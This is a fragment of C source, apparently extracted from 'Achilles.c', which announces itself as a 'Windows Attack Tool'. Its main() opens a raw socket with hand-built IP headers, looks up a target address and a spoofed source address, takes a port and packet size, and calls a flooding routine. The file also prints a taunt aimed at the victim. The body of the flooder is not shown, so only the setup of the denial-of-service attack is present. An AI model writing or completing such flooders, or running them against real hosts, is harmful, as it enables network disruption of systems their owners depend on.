
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int on ;


 int IPPROTO_IP ;
 int IPPROTO_RAW ;
 int IP_HDRINCL ;
 int PF_INET ;
 int SOCK_RAW ;
 void* atoi (char*) ;
 void* bgport ;
 void* bgsize ;
 int exit (int) ;
 int fflush (int ) ;
 int flooder () ;
 int getgid () ;
 int getpid () ;
 scalar_t__ getppid () ;
 int getuid () ;
 void* lookup (char*) ;
 int perror (char*) ;
 int printf (char*) ;
 void* radd ;
 int setgid (int ) ;
 scalar_t__ setsockopt (int ,int ,int ,char*,int) ;
 int setuid (int ) ;
 int sock ;
 int socket (int ,int ,int ) ;
 void* sradd ;
 int srand (scalar_t__) ;
 int stdout ;
 int time (int *) ;
 int usage (char*) ;

int main(int argc, char *argv[])
{
    int on = 1;

    printf("Achilles.c Windows Attack Tool\n");


    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
       perror("setsockopt");
       exit(1);

    }

    srand((time(((void*)0)) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd = lookup(argv[1]);
    bgport = atoi(argv[3]);
    bgsize = atoi(argv[4]);
    sradd = lookup(argv[2]);
    printf("Achilles: Before my time is done I will look down on your corpse and smile.\n");

    flooder();

    return 0;
}
